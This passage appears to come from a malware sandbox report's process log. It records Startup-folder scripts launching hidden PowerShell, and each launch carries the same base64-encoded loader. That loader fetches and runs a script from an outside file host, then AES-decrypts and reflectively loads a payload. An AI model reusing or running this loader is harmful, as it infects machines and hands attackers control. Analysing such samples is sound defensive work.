N1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9